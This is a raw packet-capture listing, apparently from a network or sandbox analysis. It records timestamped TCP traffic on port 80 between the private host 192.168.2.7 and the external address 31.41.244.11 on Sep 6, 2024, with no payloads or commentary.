Sep 6, 2024 09:58:05.776313066 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.780939102 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.780965090 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.781017065 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.781017065 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.781251907 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.781363010 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.903528929 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.903553009 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.903565884 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.903577089 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.903599024 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.903600931 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.903642893 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.903669119 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.903844118 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.903856039 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.903870106 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.903881073 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.903893948 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.903903961 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.903934002 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.904581070 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.904625893 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.904629946 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.904638052 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.904675961 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.904699087 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.904711008 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.904742002 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.905471087 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.905484915 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.905495882 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.905524969 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.905556917 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.905586958 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.905597925 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.905656099 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.906315088 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.906327963 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.906339884 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.906374931 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.906399012 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.908777952 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.908885002 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.908947945 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.030740023 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.030765057 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.030778885 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.030791998 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.030805111 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.030817986 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.030817032 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.030853033 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.030898094 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.030899048 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.030910969 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.030935049 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.030956984 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.030977964 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.031076908 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031090021 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031102896 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031116009 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031130075 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.031156063 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.031373978 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031387091 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031419039 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031431913 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031440973 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.031450033 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031476021 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.031511068 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.031702995 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031749964 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031761885 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031810045 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.031835079 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031842947 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.031848907 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031862020 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.031884909 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.031927109 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.032221079 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.032227039 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.032233000 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.032273054 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.032349110 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.032397032 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.032464027 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.032507896 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.032824993 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.032844067 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.032856941 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.032871008 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.032877922 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.032883883 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.032893896 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.032898903 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.032912016 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.032919884 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.032926083 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.032947063 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.032962084 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.033117056 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.033195972 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.033220053 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.033235073 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.033260107 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.033273935 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.033277988 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.033291101 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.033303022 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.033315897 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.033317089 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.033330917 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.033330917 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.033344030 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.033354998 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.033355951 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.033373117 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.033382893 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.033407927 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.035609961 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.035654068 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.035686016 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.035715103 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.035810947 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.035823107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.035870075 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.158552885 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158584118 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158601999 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158615112 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158626080 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158638000 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158653975 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158652067 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.158665895 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158698082 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158708096 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158710957 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.158721924 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158730030 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.158732891 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158757925 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.158760071 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158771038 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158782959 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158791065 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.158796072 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158819914 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.158854008 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.158869982 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158881903 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158895016 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158915997 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.158922911 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158932924 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158945084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158945084 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.158957005 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.158976078 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159007072 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159039021 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159049988 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159080982 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159109116 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159157038 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159204960 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159674883 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159687042 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159698963 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159712076 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159740925 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159749031 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159753084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159764051 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159780979 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159785986 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159800053 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159804106 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159816980 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159821987 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159827948 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159841061 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159847021 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159852982 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159868002 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159874916 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159876108 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159881115 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159885883 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159889936 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159893036 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159894943 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159903049 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159918070 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159924030 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159930944 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159943104 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159955025 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159955978 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.159969091 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.159995079 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.163981915 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164005995 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164019108 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164046049 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164048910 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164061069 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164079905 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164093018 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164102077 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164110899 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164123058 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164129019 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164136887 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164149046 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164151907 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164170027 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164171934 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164190054 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164211035 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164220095 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164231062 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164232016 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164242983 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164253950 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164267063 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164282084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164287090 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164294004 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164309978 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164311886 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164321899 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164334059 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164351940 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164351940 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164365053 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164376020 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164376974 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164388895 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164401054 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164403915 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164413929 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164419889 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164428949 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164441109 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164448023 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164468050 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164484978 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164540052 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164577961 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164781094 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164792061 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164803982 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164818048 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164827108 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164829969 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164840937 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164854050 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164854050 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164868116 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.164872885 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164894104 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.164923906 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.249536991 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249558926 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249564886 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249603987 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.249634981 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.249658108 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249679089 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249691963 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249696970 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.249703884 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249716043 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249727011 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.249730110 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249742031 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249753952 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249756098 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.249767065 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249773979 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.249778032 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249792099 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249793053 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.249803066 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.249819040 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.249845028 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305361986 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305414915 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305428982 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305443048 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305460930 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305466890 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305478096 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305480003 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305490971 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305497885 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305502892 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305522919 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305522919 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305531025 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305533886 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305538893 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305576086 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305577993 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305588007 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305596113 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305603981 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305618048 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305629969 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305633068 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305641890 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305654049 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305663109 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305665016 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305676937 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305680037 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305691004 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305702925 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305706978 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305715084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305726051 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305732965 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305741072 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305751085 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305752993 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305766106 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305767059 CEST	49719	80	192.168.2.7	31.41.244.11
